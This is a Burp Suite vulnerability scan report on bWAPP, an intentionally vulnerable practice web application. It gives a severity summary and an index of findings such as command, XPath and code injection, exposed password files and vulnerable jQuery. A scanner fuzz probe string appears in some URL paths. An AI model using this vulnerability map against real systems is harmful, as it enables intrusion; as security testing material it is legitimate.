bWAPP Scan Using BurpSuite

Summary

The table below shows the numbers of issues identified in different categories. Issues are classified according to severity as High, Medium, Low or Information. This reflects the likely impact of each issue for a typical organization. Issues are also classified according to confidence as Certain, Firm or Tentative. This reflects the inherent reliability of the technique that was used to identify the issue.

                     Confidence
    Severity         Certain  Firm  Tentative  Total
    High                  17   156          0    173
    Medium                 6     3          6     15
    Low                  405    23          1    429
    Information          510   233        125    868

The chart below shows the aggregated numbers of issues identified in each category. Solid colored bars represent issues with a confidence level of Certain, and the bars fade as the confidence level falls.

[Chart: number of issues (axis 0 to 450) by severity: High, Medium, Low]

Contents

1. OS command injection

2. XPath injection

2.1. http://192.168.52.147/bWAPP/ [Referer HTTP header]

2.2. http://192.168.52.147/bWAPP/ [User-Agent HTTP header]

2.3. http://192.168.52.147/bWAPP/ [name of an arbitrarily supplied URL parameter]

2.4. http://192.168.52.147/bWAPP/ba_captcha_bypass.php [Base64-decoded value of the secret cookie]

2.5. http://192.168.52.147/bWAPP/ba_captcha_bypass.php [Referer HTTP header]

2.6. http://192.168.52.147/bWAPP/ba_captcha_bypass.php [User-Agent HTTP header]

2.7. http://192.168.52.147/bWAPP/ba_captcha_bypass.php [admin cookie]

2.8. http://192.168.52.147/bWAPP/ba_captcha_bypass.php [bug parameter]

2.9. http://192.168.52.147/bWAPP/ba_captcha_bypass.php [form_bug parameter]

2.10. http://192.168.52.147/bWAPP/ba_captcha_bypass.php [form_security_level parameter]

2.11. http://192.168.52.147/bWAPP/ba_captcha_bypass.php [name of an arbitrarily supplied URL parameter]

2.12. http://192.168.52.147/bWAPP/ba_captcha_bypass.php [name of an arbitrarily supplied body parameter]

2.13. http://192.168.52.147/bWAPP/ba_captcha_bypass.php [secret cookie]

2.14. http://192.168.52.147/bWAPP/ba_captcha_bypass.php [security_level cookie]

2.15. http://192.168.52.147/bWAPP/ba_captcha_bypass.php [security_level parameter]

2.16. http://192.168.52.147/bWAPP/ba_captcha_bypass.php [top_security_nossl cookie]

2.17. http://192.168.52.147/bWAPP/ba_forgotten.php [Base64-decoded value of the secret cookie]

2.18. http://192.168.52.147/bWAPP/ba_forgotten.php [Referer HTTP header]

2.19. http://192.168.52.147/bWAPP/ba_forgotten.php [User-Agent HTTP header]

2.20. http://192.168.52.147/bWAPP/ba_forgotten.php [admin cookie]

2.21. http://192.168.52.147/bWAPP/ba_forgotten.php [bug parameter]

2.22. http://192.168.52.147/bWAPP/ba_forgotten.php [form_bug parameter]

2.23. http://192.168.52.147/bWAPP/ba_forgotten.php [form_security_level parameter]

2.24. http://192.168.52.147/bWAPP/ba_forgotten.php [name of an arbitrarily supplied URL parameter]

2.25. http://192.168.52.147/bWAPP/ba_forgotten.php [name of an arbitrarily supplied body parameter]

2.26. http://192.168.52.147/bWAPP/ba_forgotten.php [secret cookie]

2.27. http://192.168.52.147/bWAPP/ba_forgotten.php [security_level cookie]

2.28. http://192.168.52.147/bWAPP/ba_forgotten.php [security_level parameter]

2.29. http://192.168.52.147/bWAPP/ba_forgotten.php [top_security_nossl cookie]

2.30. http://192.168.52.147/bWAPP/ba_insecure_login.php [Base64-decoded value of the secret cookie]

2.31. http://192.168.52.147/bWAPP/ba_insecure_login.php [Referer HTTP header]

2.32. http://192.168.52.147/bWAPP/ba_insecure_login.php [User-Agent HTTP header]

2.33. http://192.168.52.147/bWAPP/ba_insecure_login.php [admin cookie]

2.34. http://192.168.52.147/bWAPP/ba_insecure_login.php [name of an arbitrarily supplied URL parameter]

2.35. http://192.168.52.147/bWAPP/ba_insecure_login.php [secret cookie]

2.36. http://192.168.52.147/bWAPP/ba_insecure_login.php [security_level cookie]

2.37. http://192.168.52.147/bWAPP/ba_insecure_login_2.php [Base64-decoded value of the secret cookie]

2.38. http://192.168.52.147/bWAPP/ba_insecure_login_2.php [Referer HTTP header]

2.39. http://192.168.52.147/bWAPP/ba_insecure_login_2.php [User-Agent HTTP header]

2.40. http://192.168.52.147/bWAPP/ba_insecure_login_2.php [admin cookie]

2.41. http://192.168.52.147/bWAPP/ba_insecure_login_2.php [bug parameter]

2.42. http://192.168.52.147/bWAPP/ba_insecure_login_2.php [form_bug parameter]

2.43. http://192.168.52.147/bWAPP/ba_insecure_login_2.php [form_security_level parameter]

2.44. http://192.168.52.147/bWAPP/ba_insecure_login_2.php [movie_genre cookie]

2.45. http://192.168.52.147/bWAPP/ba_insecure_login_2.php [name of an arbitrarily supplied URL parameter]

2.46. http://192.168.52.147/bWAPP/ba_insecure_login_2.php [name of an arbitrarily supplied body parameter]

2.47. http://192.168.52.147/bWAPP/ba_insecure_login_2.php [secret cookie]

2.48. http://192.168.52.147/bWAPP/ba_insecure_login_2.php [security_level cookie]

2.49. http://192.168.52.147/bWAPP/ba_insecure_login_2.php [security_level parameter]

2.50. http://192.168.52.147/bWAPP/ba_pwd_attacks.php [Base64-decoded value of the secret cookie]

2.51. http://192.168.52.147/bWAPP/ba_pwd_attacks.php [Referer HTTP header]

2.52. http://192.168.52.147/bWAPP/ba_pwd_attacks.php [User-Agent HTTP header]

2.53. http://192.168.52.147/bWAPP/ba_pwd_attacks.php [admin cookie]

2.54. http://192.168.52.147/bWAPP/ba_pwd_attacks.php [name of an arbitrarily supplied URL parameter]

2.55. http://192.168.52.147/bWAPP/ba_pwd_attacks.php [secret cookie]

2.56. http://192.168.52.147/bWAPP/ba_pwd_attacks.php [security_level cookie]

2.57. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php [Base64-decoded value of the secret cookie]

2.58. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php [Referer HTTP header]

2.59. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php [User-Agent HTTP header]

2.60. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php [admin cookie]

2.61. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php [bug parameter]

2.62. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php [form_bug parameter]

2.63. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php [form_security_level parameter]

2.64. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php [movie_genre cookie]

2.65. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php [name of an arbitrarily supplied URL parameter]

2.66. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php [name of an arbitrarily supplied body parameter]

2.67. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php [secret cookie]

2.68. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php [security_level cookie]

2.69. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php [security_level parameter]

2.70. http://192.168.52.147/bWAPP/ba_weak_pwd.php [Base64-decoded value of the secret cookie]

2.71. http://192.168.52.147/bWAPP/ba_weak_pwd.php [Referer HTTP header]

2.72. http://192.168.52.147/bWAPP/ba_weak_pwd.php [User-Agent HTTP header]

2.73. http://192.168.52.147/bWAPP/ba_weak_pwd.php [admin cookie]

2.74. http://192.168.52.147/bWAPP/ba_weak_pwd.php [bug parameter]

2.75. http://192.168.52.147/bWAPP/ba_weak_pwd.php [form_bug parameter]

2.76. http://192.168.52.147/bWAPP/ba_weak_pwd.php [form_security_level parameter]

2.77. http://192.168.52.147/bWAPP/ba_weak_pwd.php [name of an arbitrarily supplied URL parameter]

2.78. http://192.168.52.147/bWAPP/ba_weak_pwd.php [name of an arbitrarily supplied body parameter]

2.79. http://192.168.52.147/bWAPP/ba_weak_pwd.php [secret cookie]

2.80. http://192.168.52.147/bWAPP/ba_weak_pwd.php [security_level cookie]

2.81. http://192.168.52.147/bWAPP/ba_weak_pwd.php [security_level parameter]

2.82. http://192.168.52.147/bWAPP/ba_weak_pwd.php [top_security_nossl cookie]

2.83. http://192.168.52.147/bWAPP/bof_1.php [Base64-decoded value of the secret cookie]

2.84. http://192.168.52.147/bWAPP/bof_1.php [Referer HTTP header]

2.85. http://192.168.52.147/bWAPP/bof_1.php [User-Agent HTTP header]

2.86. http://192.168.52.147/bWAPP/bof_1.php [admin cookie]

2.87. http://192.168.52.147/bWAPP/bof_1.php [bug parameter]

2.88. http://192.168.52.147/bWAPP/bof_1.php [form_bug parameter]

2.89. http://192.168.52.147/bWAPP/bof_1.php [form_security_level parameter]

2.90. http://192.168.52.147/bWAPP/bof_1.php [movie_genre cookie]

2.91. http://192.168.52.147/bWAPP/bof_1.php [name of an arbitrarily supplied URL parameter]

2.92. http://192.168.52.147/bWAPP/bof_1.php [name of an arbitrarily supplied body parameter]

2.93. http://192.168.52.147/bWAPP/bof_1.php [secret cookie]

2.94. http://192.168.52.147/bWAPP/bof_1.php [security_level cookie]

2.95. http://192.168.52.147/bWAPP/bof_1.php [security_level parameter]

2.96. http://192.168.52.147/bWAPP/bof_2.php [Base64-decoded value of the secret cookie]

2.97. http://192.168.52.147/bWAPP/bof_2.php [Referer HTTP header]

2.98. http://192.168.52.147/bWAPP/bof_2.php [User-Agent HTTP header]

2.99. http://192.168.52.147/bWAPP/bof_2.php [admin cookie]

2.100. http://192.168.52.147/bWAPP/bof_2.php [bug parameter]

2.101. http://192.168.52.147/bWAPP/bof_2.php [form_bug parameter]

2.102. http://192.168.52.147/bWAPP/bof_2.php [form_security_level parameter]

2.103. http://192.168.52.147/bWAPP/bof_2.php [movie_genre cookie]

2.104. http://192.168.52.147/bWAPP/bof_2.php [name of an arbitrarily supplied URL parameter]

2.105. http://192.168.52.147/bWAPP/bof_2.php [name of an arbitrarily supplied body parameter]

2.106. http://192.168.52.147/bWAPP/bof_2.php [secret cookie]

2.107. http://192.168.52.147/bWAPP/bof_2.php [security_level cookie]

2.108. http://192.168.52.147/bWAPP/bof_2.php [security_level parameter]

2.109. http://192.168.52.147/bWAPP/clickjacking.php [Base64-decoded value of the secret cookie]

2.110. http://192.168.52.147/bWAPP/clickjacking.php [Referer HTTP header]

2.111. http://192.168.52.147/bWAPP/clickjacking.php [User-Agent HTTP header]

2.112. http://192.168.52.147/bWAPP/clickjacking.php [bug parameter]

2.113. http://192.168.52.147/bWAPP/clickjacking.php [form_bug parameter]

2.114. http://192.168.52.147/bWAPP/clickjacking.php [form_security_level parameter]

2.115. http://192.168.52.147/bWAPP/clickjacking.php [name of an arbitrarily supplied URL parameter]

2.116. http://192.168.52.147/bWAPP/clickjacking.php [name of an arbitrarily supplied body parameter]

2.117. http://192.168.52.147/bWAPP/clickjacking.php [secret cookie]

2.118. http://192.168.52.147/bWAPP/clickjacking.php [security_level cookie]

2.119. http://192.168.52.147/bWAPP/clickjacking.php [security_level parameter]

2.120. http://192.168.52.147/bWAPP/commandi.php [bug parameter]

2.121. http://192.168.52.147/bWAPP/commandi.php [form_bug parameter]

2.122. http://192.168.52.147/bWAPP/commandi.php [form_security_level parameter]

2.123. http://192.168.52.147/bWAPP/commandi.php [name of an arbitrarily supplied body parameter]

2.124. http://192.168.52.147/bWAPP/commandi.php [security_level cookie]

2.125. http://192.168.52.147/bWAPP/commandi.php [security_level parameter]

2.126. http://192.168.52.147/bWAPP/login.php [PHPSESSID cookie]

2.127. http://192.168.52.147/bWAPP/login.php [Referer HTTP header]

2.128. http://192.168.52.147/bWAPP/login.php [User-Agent HTTP header]

2.129. http://192.168.52.147/bWAPP/login.php [form parameter]

2.130. http://192.168.52.147/bWAPP/login.php [name of an arbitrarily supplied URL parameter]

2.131. http://192.168.52.147/bWAPP/login.php [name of an arbitrarily supplied body parameter]

2.132. http://192.168.52.147/bWAPP/login.php [security_level parameter]

2.133. http://192.168.52.147/bWAPP/sqli_1.php [Base64-decoded value of the secret cookie]

2.134. http://192.168.52.147/bWAPP/sqli_1.php [Referer HTTP header]

2.135. http://192.168.52.147/bWAPP/sqli_1.php [User-Agent HTTP header]

2.136. http://192.168.52.147/bWAPP/sqli_1.php [admin cookie]

2.137. http://192.168.52.147/bWAPP/sqli_1.php [bug parameter]

2.138. http://192.168.52.147/bWAPP/sqli_1.php [form_bug parameter]

2.139. http://192.168.52.147/bWAPP/sqli_1.php [form_security_level parameter]

2.140. http://192.168.52.147/bWAPP/sqli_1.php [name of an arbitrarily supplied URL parameter]

2.141. http://192.168.52.147/bWAPP/sqli_1.php [name of an arbitrarily supplied body parameter]

2.142. http://192.168.52.147/bWAPP/sqli_1.php [secret cookie]

2.143. http://192.168.52.147/bWAPP/sqli_1.php [security_level cookie]

2.144. http://192.168.52.147/bWAPP/sqli_1.php [security_level parameter]

2.145. http://192.168.52.147/bWAPP/sqli_1.php [top_security_nossl cookie]

2.146. http://192.168.52.147/bWAPP/xmli_1.php [admin cookie]

2.147. http://192.168.52.147/bWAPP/xmli_1.php [bug parameter]

2.148. http://192.168.52.147/bWAPP/xmli_1.php [form_bug parameter]

2.149. http://192.168.52.147/bWAPP/xmli_1.php [secret cookie]

2.150. http://192.168.52.147/bWAPP/xmli_1.php [security_level cookie]

2.151. http://192.168.52.147/bWAPP/xss_eval.php [bug parameter]

2.152. http://192.168.52.147/bWAPP/xss_eval.php [form_bug parameter]

3. Cross-site scripting (reflected)

3.1. http://192.168.52.147/bWAPP/ws_soap.php [name of an arbitrarily supplied URL parameter]

3.2. http://192.168.52.147/bWAPP/ws_soap.php [name of an arbitrarily supplied URL parameter]

4. Cleartext submission of password

4.1. http://192.168.52.147/bWAPP/ba_captcha_bypass.php

4.2. http://192.168.52.147/bWAPP/ba_insecure_login_2.php

4.3. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php

4.4. http://192.168.52.147/bWAPP/ba_weak_pwd.php

4.5. http://192.168.52.147/bWAPP/http_verb_tampering.php

4.6. http://192.168.52.147/bWAPP/insecure_crypt_storage_2.php

4.7. http://192.168.52.147/bWAPP/ldap_connect.php

4.8. http://192.168.52.147/bWAPP/login.php

4.9. http://192.168.52.147/bWAPP/password_change.php

4.10. http://192.168.52.147/bWAPP/sqli_16.php

4.11. http://192.168.52.147/bWAPP/sqli_3.php

4.12. http://192.168.52.147/bWAPP/user_extra.php

4.13. http://192.168.52.147/bWAPP/user_new.php

4.14. http://192.168.52.147/bWAPP/xmli_1.php

4.15. http://192.168.52.147/bWAPP/xss_login.php

5. Code injection

5.1. http://192.168.52.147/bWAPP/cgi-bin/shellshock.sh [User-Agent HTTP header]

5.2. http://192.168.52.147/bWAPP/clickjacking.php [bug parameter]

5.3. http://192.168.52.147/bWAPP/commandi.php [Referer HTTP header]

6. Session token in URL

7. Database connection string disclosed

8. The file 'sqli_10-1.php' includes a vulnerable version of the library 'jquery'

8.1. http://192.168.52.147/bWAPP/sqli_10-1.php

8.2. http://192.168.52.147/bWAPP/sqli_10-1.php

8.3. http://192.168.52.147/bWAPP/sqli_10-1.php

9. Host header poisoning

9.1. http://192.168.52.147/bWAPP/aim.php [PHPSESSID cookie]

9.2. http://192.168.52.147/bWAPP/fonts/ [security_level cookie]

9.3. http://192.168.52.147/bWAPP/logs/ [PHPSESSID cookie]

9.4. http://192.168.52.147/bWAPP/passwords/ [PHPSESSID cookie]

9.5. http://192.168.52.147/bWAPP/passwords/accounts.txt [PHPSESSID cookie]

9.6. http://192.168.52.147/bWAPP/ws_soap.php [PHPSESSID cookie]

10. The file 'jquery-1.4.4.min.js' includes a vulnerable version of the library 'jquery'

10.1. http://192.168.52.147/bWAPP/js/jquery-1.4.4.min.js

10.2. http://192.168.52.147/bWAPP/js/jquery-1.4.4.min.js

10.3. http://192.168.52.147/bWAPP/js/jquery-1.4.4.min.js

11. Interesting input handling: Shell injection

12. Password submitted using GET method

12.1. http://192.168.52.147/bWAPP/ba_insecure_login_2.php

12.2. http://192.168.52.147/bWAPP/xmli_1.php

13. Cookie without HttpOnly flag set

13.1. http://192.168.52.147/bWAPP/ba_captcha_bypass.php

13.2. http://192.168.52.147/bWAPP/ba_forgotten.php

13.3. http://192.168.52.147/bWAPP/ba_insecure_login_2.php

13.4. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php

13.5. http://192.168.52.147/bWAPP/ba_weak_pwd.php

13.6. http://192.168.52.147/bWAPP/bof_1.php

13.7. http://192.168.52.147/bWAPP/bof_2.php

13.8. http://192.168.52.147/bWAPP/captcha_box.php

13.9. http://192.168.52.147/bWAPP/clickjacking.php

13.10. http://192.168.52.147/bWAPP/commandi.php

13.11. http://192.168.52.147/bWAPP/login.php

13.12. http://192.168.52.147/bWAPP/portal.php

13.13. http://192.168.52.147/bWAPP/sqli_1.php

13.14. http://192.168.52.147/bWAPP/sqli_10-1.php

13.15. http://192.168.52.147/bWAPP/xmli_1.php

13.16. http://192.168.52.147/bWAPP/insecure_crypt_storage_3.php

13.17. http://192.168.52.147/bWAPP/xss_stored_2.php

14. Password field with autocomplete enabled

14.1. http://192.168.52.147/bWAPP/ba_insecure_login_2.php

14.2. http://192.168.52.147/bWAPP/http_verb_tampering.php

14.3. http://192.168.52.147/bWAPP/insecure_crypt_storage_2.php

14.4. http://192.168.52.147/bWAPP/insuff_transp_layer_protect_1.php

14.5. http://192.168.52.147/bWAPP/password_change.php

14.6. http://192.168.52.147/bWAPP/sm_mitm_1.php

14.7. http://192.168.52.147/bWAPP/user_extra.php

14.8. http://192.168.52.147/bWAPP/user_new.php

15. Source code disclosure

16. Content type incorrectly stated

16.1. http://192.168.52.147/bWAPP/fonts/arial.ttf

16.2. http://192.168.52.147/bWAPP/fonts/arialbd.ttf

16.3. http://192.168.52.147/bWAPP/fonts/arialbi.ttf

16.4. http://192.168.52.147/bWAPP/fonts/ariali.ttf

16.5. http://192.168.52.147/bWAPP/fonts/ariblk.ttf

16.6. http://192.168.52.147/bWAPP/fonts/atommicclock.gdf

16.7. http://192.168.52.147/bWAPP/fonts/backlash.gdf

16.8. http://192.168.52.147/bWAPP/restrict_folder_access.php

17. Metadata in PDF File(s)

17.1. http://192.168.52.147/bWAPP/restrict_folder_access.php

17.2. http://192.168.52.147/bWAPP/restrict_folder_access.php

17.3. http://192.168.52.147/bWAPP/restrict_folder_access.php

17.4. http://192.168.52.147/bWAPP/restrict_folder_access.php

17.5. http://192.168.52.147/bWAPP/restrict_folder_access.php

17.6. http://192.168.52.147/bWAPP/restrict_folder_access.php

18. Content Sniffing not disabled

18.1. http://192.168.52.147/bWAPP/

18.2. http://192.168.52.147/bWAPP/666

18.3. http://192.168.52.147/bWAPP/admin/

18.4. http://192.168.52.147/bWAPP/admin/index.php

18.5. http://192.168.52.147/bWAPP/admin/phpinfo.php

18.6. http://192.168.52.147/bWAPP/admin/phpinfo.php/

18.7. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/

18.8. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/

18.9. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/

18.10. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/

18.11. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/

18.12. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/DTD/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c

18.13. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd

18.14. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd

18.15. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd

18.16. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/xhtml1-transitional.dtd

18.17. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/xhtml1-transitional.dtd

18.18. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/xhtml1-transitional.dtd

18.19. http://192.168.52.147/bWAPP/admin/phpinfo.php/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c

18.20. http://192.168.52.147/bWAPP/aim.php

18.21. http://192.168.52.147/bWAPP/ba_captcha_bypass.php

18.22. http://192.168.52.147/bWAPP/ba_forgotten.php

18.23. http://192.168.52.147/bWAPP/ba_insecure_login.php

18.24. http://192.168.52.147/bWAPP/ba_insecure_login_2.php

18.25. http://192.168.52.147/bWAPP/ba_pwd_attacks.php

18.26. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php

18.27. http://192.168.52.147/bWAPP/ba_weak_pwd.php

18.28. http://192.168.52.147/bWAPP/bof_1.php

18.29. http://192.168.52.147/bWAPP/bof_2.php

18.30. http://192.168.52.147/bWAPP/captcha_box.php

18.31. http://192.168.52.147/bWAPP/cgi-bin/shellshock.sh

18.32. http://192.168.52.147/bWAPP/clickjacking.php

18.33. http://192.168.52.147/bWAPP/clickjacking.php/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c

18.34. http://192.168.52.147/bWAPP/commandi.php

18.35. http://192.168.52.147/bWAPP/commandi.php/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c

18.36. http://192.168.52.147/bWAPP/commandi_blind.php

18.37. http://192.168.52.147/bWAPP/credits.php

18.38. http://192.168.52.147/bWAPP/csrf_2.php

18.39. http://192.168.52.147/bWAPP/csrf_3.php

18.40. http://192.168.52.147/bWAPP/directory_traversal_1.php

18.41. http://192.168.52.147/bWAPP/directory_traversal_2.php

18.42. http://192.168.52.147/bWAPP/fonts/

18.43. http://192.168.52.147/bWAPP/fonts/arial.ttf

18.44. http://192.168.52.147/bWAPP/fonts/arialbd.ttf

18.45. http://192.168.52.147/bWAPP/fonts/arialbi.ttf

18.46. http://192.168.52.147/bWAPP/fonts/ariali.ttf

18.47. http://192.168.52.147/bWAPP/fonts/ariblk.ttf

18.48. http://192.168.52.147/bWAPP/fonts/atommicclock.gdf

18.49. http://192.168.52.147/bWAPP/fonts/backlash.gdf

18.50. http://192.168.52.147/bWAPP/fonts/hootie.gdf

18.51. http://192.168.52.147/bWAPP/heartbleed.php

18.52. http://192.168.52.147/bWAPP/hostheader_1.php

18.53. http://192.168.52.147/bWAPP/hostheader_2.php

18.54. http://192.168.52.147/bWAPP/hpp-1.php

18.55. http://192.168.52.147/bWAPP/hpp-2.php

18.56. http://192.168.52.147/bWAPP/hpp-3.php

18.57. http://192.168.52.147/bWAPP/htmli_current_url.php

18.58. http://192.168.52.147/bWAPP/htmli_get.php

18.59. http://192.168.52.147/bWAPP/htmli_post.php

18.60. http://192.168.52.147/bWAPP/htmli_stored.php

18.61. http://192.168.52.147/bWAPP/http_response_splitting.php

18.62. http://192.168.52.147/bWAPP/http_verb_tampering.php

18.63. http://192.168.52.147/bWAPP/iframei.php

18.64. http://192.168.52.147/bWAPP/images/

18.65. http://192.168.52.147/bWAPP/images/file.txt

18.66. http://192.168.52.147/bWAPP/images/spider.swf

18.67. http://192.168.52.147/bWAPP/info.php

18.68. http://192.168.52.147/bWAPP/information_disclosure_1.php

18.69. http://192.168.52.147/bWAPP/information_disclosure_2.php

18.70. http://192.168.52.147/bWAPP/information_disclosure_3.php

18.71. http://192.168.52.147/bWAPP/information_disclosure_4.php

18.72. http://192.168.52.147/bWAPP/insecure_crypt_storage_1.php

18.73. http://192.168.52.147/bWAPP/insecure_crypt_storage_2.php

18.74. http://192.168.52.147/bWAPP/insecure_crypt_storage_3.php

18.75. http://192.168.52.147/bWAPP/insecure_direct_object_ref_1.php

18.76. http://192.168.52.147/bWAPP/insecure_direct_object_ref_2.php

18.77. http://192.168.52.147/bWAPP/insecure_direct_object_ref_3.php

18.78. http://192.168.52.147/bWAPP/insecure_iframe.php

18.79. http://192.168.52.147/bWAPP/insuff_transp_layer_protect_1.php

18.80. http://192.168.52.147/bWAPP/insuff_transp_layer_protect_2.php

18.81. http://192.168.52.147/bWAPP/insuff_transp_layer_protect_3.php

18.82. http://192.168.52.147/bWAPP/insuff_transp_layer_protect_4.php

18.83. http://192.168.52.147/bWAPP/js/

18.84. http://192.168.52.147/bWAPP/js/html5.js

18.85. http://192.168.52.147/bWAPP/js/jquery-1.4.4.min.js

18.86. http://192.168.52.147/bWAPP/js/json2.js

18.87. http://192.168.52.147/bWAPP/js/xss_ajax_1.js

18.88. http://192.168.52.147/bWAPP/ldap_connect.php

18.89. http://192.168.52.147/bWAPP/ldapi.php

18.90. http://192.168.52.147/bWAPP/lfi_sqlitemanager.php

18.91. http://192.168.52.147/bWAPP/login.php

18.92. http://192.168.52.147/bWAPP/logout.php

18.93. http://192.168.52.147/bWAPP/logs/

18.94. http://192.168.52.147/bWAPP/logs/visitors.txt

18.95. http://192.168.52.147/bWAPP/maili.php

18.96. http://192.168.52.147/bWAPP/manual_interv.php

18.97. http://192.168.52.147/bWAPP/password_change.php

18.98. http://192.168.52.147/bWAPP/passwords/

18.99. http://192.168.52.147/bWAPP/passwords/accounts.txt

18.100. http://192.168.52.147/bWAPP/passwords/heroes.xml

18.101. http://192.168.52.147/bWAPP/passwords/web.config.bak

18.102. http://192.168.52.147/bWAPP/passwords/wp-config.bak

18.103. http://192.168.52.147/bWAPP/php_cgi.php

18.104. http://192.168.52.147/bWAPP/php_eval.php

18.105. http://192.168.52.147/bWAPP/phpi.php

18.106. http://192.168.52.147/bWAPP/phpi_sqlitemanager.php

18.107. http://192.168.52.147/bWAPP/portal.php

18.108. http://192.168.52.147/bWAPP/reset.php

18.109. http://192.168.52.147/bWAPP/restrict_device_access.php

18.110. http://192.168.52.147/bWAPP/restrict_folder_access.php

18.111. http://192.168.52.147/bWAPP/rlfi.php

18.112. http://192.168.52.147/bWAPP/robots.txt

18.113. http://192.168.52.147/bWAPP/secret-cors-2.php

18.114. http://192.168.52.147/bWAPP/secret.php

18.115. http://192.168.52.147/bWAPP/secret_html.php

18.116. http://192.168.52.147/bWAPP/security_level_set.php

18.117. http://192.168.52.147/bWAPP/shellshock.php

18.118. http://192.168.52.147/bWAPP/sm_cors.php

18.119. http://192.168.52.147/bWAPP/sm_cross_domain_policy.php

18.120. http://192.168.52.147/bWAPP/sm_dos_1.php

18.121. http://192.168.52.147/bWAPP/sm_dos_3.php

18.122. http://192.168.52.147/bWAPP/sm_dos_4.php

18.123. http://192.168.52.147/bWAPP/sm_ftp.php

18.124. http://192.168.52.147/bWAPP/sm_local_priv_esc_1.php

18.125. http://192.168.52.147/bWAPP/sm_local_priv_esc_2.php

18.126. http://192.168.52.147/bWAPP/sm_mitm_1.php

18.127. http://192.168.52.147/bWAPP/sm_mitm_2.php

18.128. http://192.168.52.147/bWAPP/sm_robots.php

18.129. http://192.168.52.147/bWAPP/sm_samba.php

18.130. http://192.168.52.147/bWAPP/sm_snmp.php

18.131. http://192.168.52.147/bWAPP/sm_webdav.php

18.132. http://192.168.52.147/bWAPP/sm_xst.php

18.133. http://192.168.52.147/bWAPP/smgmt_admin_portal.php

18.134. http://192.168.52.147/bWAPP/smgmt_cookies_httponly.php

18.135. http://192.168.52.147/bWAPP/smgmt_cookies_secure.php

18.136. http://192.168.52.147/bWAPP/smgmt_sessionid_url.php

18.137. http://192.168.52.147/bWAPP/smgmt_strong_sessions.php

18.138. http://192.168.52.147/bWAPP/sqli_1.php

18.139. http://192.168.52.147/bWAPP/sqli_10-1.php

18.140. http://192.168.52.147/bWAPP/sqli_11.php

18.141. http://192.168.52.147/bWAPP/sqli_12.php

18.142. http://192.168.52.147/bWAPP/sqli_13.php

18.143. http://192.168.52.147/bWAPP/sqli_14.php

18.144. http://192.168.52.147/bWAPP/sqli_15.php

18.145. http://192.168.52.147/bWAPP/sqli_16.php

18.146. http://192.168.52.147/bWAPP/sqli_17.php

18.147. http://192.168.52.147/bWAPP/sqli_2.php

18.148. http://192.168.52.147/bWAPP/sqli_3.php

18.149. http://192.168.52.147/bWAPP/sqli_4.php

18.150. http://192.168.52.147/bWAPP/sqli_5.php

18.151. http://192.168.52.147/bWAPP/sqli_6.php

18.152. http://192.168.52.147/bWAPP/sqli_7.php

18.153. http://192.168.52.147/bWAPP/sqli_8-1.php

18.154. http://192.168.52.147/bWAPP/sqli_9.php

18.155. http://192.168.52.147/bWAPP/sqli_drupal.php

18.156. http://192.168.52.147/bWAPP/ssii.php

18.157. http://192.168.52.147/bWAPP/ssii.shtml

18.158. http://192.168.52.147/bWAPP/ssrf.php

18.159. http://192.168.52.147/bWAPP/stylesheets/

18.160. http://192.168.52.147/bWAPP/top_security.php

18.161. http://192.168.52.147/bWAPP/training.php

18.162. http://192.168.52.147/bWAPP/unrestricted_file_upload.php

18.163. http://192.168.52.147/bWAPP/unvalidated_redir_fwd_1.php

18.164. http://192.168.52.147/bWAPP/unvalidated_redir_fwd_2.php

18.165. http://192.168.52.147/bWAPP/user_extra.php

18.166. http://192.168.52.147/bWAPP/user_new.php

18.167. http://192.168.52.147/bWAPP/ws_soap.php

18.168. http://192.168.52.147/bWAPP/xmli_1.php

18.169. http://192.168.52.147/bWAPP/xmli_2.php

18.170. http://192.168.52.147/bWAPP/xss_ajax_1-1.php

18.171. http://192.168.52.147/bWAPP/xss_ajax_2-1.php

18.172. http://192.168.52.147/bWAPP/xss_back_button.php

18.173. http://192.168.52.147/bWAPP/xss_custom_header.php

18.174. http://192.168.52.147/bWAPP/xss_eval.php

18.175. http://192.168.52.147/bWAPP/xss_get.php

18.176. http://192.168.52.147/bWAPP/xss_href-1.php

18.177. http://192.168.52.147/bWAPP/xss_href-2.php

18.178. http://192.168.52.147/bWAPP/xss_href-3.php

18.179. http://192.168.52.147/bWAPP/xss_json.php

18.180. http://192.168.52.147/bWAPP/xss_login.php

18.181. http://192.168.52.147/bWAPP/xss_php_self.php

